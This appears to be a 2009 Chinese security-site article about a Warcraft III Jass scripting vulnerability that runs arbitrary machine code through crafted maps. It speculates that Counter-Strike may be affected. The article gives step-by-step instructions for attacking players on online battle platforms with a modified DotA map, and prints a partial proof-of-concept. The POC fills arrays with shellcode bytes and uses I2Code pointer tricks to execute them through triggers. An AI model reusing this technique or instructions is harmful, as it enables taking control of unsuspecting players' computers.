首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
各大游戏高危漏洞(魔兽争霸、反恐精英)
来源:http://hi.baidu.com/ring04h/blog 作者:ring04h 发布时间:2009-08-10  

War3 Jass虚拟机经测试,存在严重漏洞!允许运行时动态创建并执行任意机器码
Jass属于War3为地图开发者提供的一套脚本语言,方便开发者开发或建立修改属于自己的地图。
经过推断,CS (cstrike)可能也存在此类问题。

利用方式:登陆浩方或者VS对战平台,修改某张地图(例如DOTA的地图),开启游戏,等待其他玩家进入,开始游戏,即可执行任意机器码,控制玩家计算机。

Jass语言的用处
Jass(正确地说是Jass2)是魔兽3的脚本语言, 用于控制地图的进程和行为, 是魔兽游戏和地图的基础. 正常的地图编辑中摆放的单位(Unit), 设置的触发(Trigger)等最终都会被翻译成Jass语言存在地图文件里在游戏时被调用.

POC:

set bj_meleeTwinkedHeroes[1024] = 0x90909090
set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish.
...

local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 )

call TriggerAddAction(t, C)
call TriggerExecute(t)

//It will run whatever bytecode 90 90 90 90 means

function main takes nothing returns nothing
set t = CreateTrigger()
call TriggerAddAction(t, i2code(0x00929217) )
a[0]=0x45623512
a[1]=0x34562323
a[2]=0x62329301
...
//other thousand lines of this
...
b[0]=0x12312333
endfunction




上图:


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Dedecms爆路径漏洞
·Dedecms多个鸡肋漏洞分析
·嘉缘人才cms系统最后一个注射漏
·国外一Blog程序0day
·WordPress 2.8.3高危漏洞
·MS09-044:远程桌面连接中的允许
·Overwrite $_FILE array in rfc1
·ESCMS 0DAY
·四通政府CMS管理系统的union注入
·dedecms注入漏洞 影响版本5.3 –
·Discuz!NT 2.5(20080826更新前
·嘉缘人才系统漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved